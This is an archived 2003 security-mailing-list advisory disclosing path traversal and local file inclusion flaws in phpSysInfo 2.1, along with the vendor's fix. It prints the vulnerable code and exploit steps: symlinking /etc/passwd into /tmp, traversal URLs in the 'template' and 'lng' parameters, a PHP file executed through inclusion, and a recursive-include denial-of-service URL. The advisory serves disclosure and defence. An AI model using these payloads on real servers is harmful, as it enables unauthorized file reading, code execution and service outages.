[UNIX] Multiple Vulnerabilities Found in phpSysInfo

• Previous message: support_at_securiteam.com: "[UNIX] Album.pl Vulnerable to Remote Command Execution"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 28 Apr 2003 16:17:44 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Multiple Vulnerabilities Found in phpSysInfo
------------------------------------------------------------------------

SUMMARY

 <http://phpsysinfo.sourceforge.net> phpSysInfo is "a little PHP script
destined to show system information. It shows data like CPU or memory
usage, Disk usage, PCI, Ethernet, and IDE information, etc". phpSysInfo
uses a template system using the 'template' variable, and a language
system using the 'lng' variable. These two variables can be used to read
files (and in the case of PHP execute them) that reside outside the
default bounding HTML root, and if directory traversing (e.g. ../../../)
is sent instead of a file, a denial of service attack will initiate on the
server.

DETAILS

Vulnerable systems:
 * phpSysInfo version 2.1 and prior

Immune systems:
 * phpSysInfo version 2.1 (CVS updated) and above

To exploit this vulnerability you are required to have write access on a
local directory where web server can read files from.

In the template's case, phpSysInfo checks only checks whether the template
exists (i.e. check if 'templates/$template' exists).

---/ index.php /---

if (!((isset($template) && file_exists("templates/$template")) ||
$template ==
'xml')) {
    // default template we should use if we don't get a argument.
    $template = 'classic';
}

---/ index.php /---

A similar check is done for the language parameter:

---/ index.php /---

if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
    $lng = 'en';
    // see if the browser knows the right languange.
    if(isset($HTTP_ACCEPT_LANGUAGE)) {
        $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
        if(count($plng) > 0) {
            while(list($k,$v) = each($plng)) {
                $k = split(';', $v, 1);
                $k = split('-', $k[0]);
                if(file_exists('./includes/lang/' . $k[0] . '.php')) {
                    $lng = $k[0];
                    break;
                }
            }
        }
    }
}

---/ index.php /---

Since the 'template' variable is suffixed by a predefined string
converting it into './templates/$template/form.tpl' and
'./templates/$template/box.tpl', we need to symbolic link these two files
to whatever file we want to read.

Example:
        local ~$ ln -s /etc/passwd /tmp/form.tpl
        local ~$ ln -s /etc/passwd /tmp/box.tpl

        http://vulnerable/index.php?template=../../../../tmp

Since the 'lng' variable uses the following piece of code, we need to link
a different filename:

---/ index.php /---

require('./includes/lang/' . $lng . '.php'); // get our language include

---/ index.php /---

Example:
        local ~$ ln -s /etc/passwd /tmp/p.php

        http://vulnerable/index.php?lng=../../../../tmp/p

However, since the PHP extension is utilized, we can cause the program to
execute arbitrary code.

Example:
First we need to create the file:

        local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php

And then request it:
        http://vulnerable/index.php?lng=../../../../tmp/p

Vendor response:
In bug report #670222 I described the same problem and how to use it to
DoS the host. Calling "index.php?lng=../../index" creates a run-a-way
recursive loop, creating a huge load and finally crashing the apache
process. This can easily be used to DoS a web server.
 
<http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015> http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015

On 19 January my fix for this problem has been incorporated in the cvs
repository. This also fixes the problems described in Albert Puigsech
Galicia's report.
 
<http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57> http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57

phpSysInfo 2.1 is vulnerable, the cvs versions after 19 january are not.

ADDITIONAL INFORMATION

The information has been provided by <mailto:ripe@7a69ezine.org> Albert
Puigsech Galicia and <mailto:security@wkamphuis.student.utwente.nl>
Wolter Kamphuis.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: support_at_securiteam.com: "[UNIX] Album.pl Vulnerable to Remote Command Execution"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]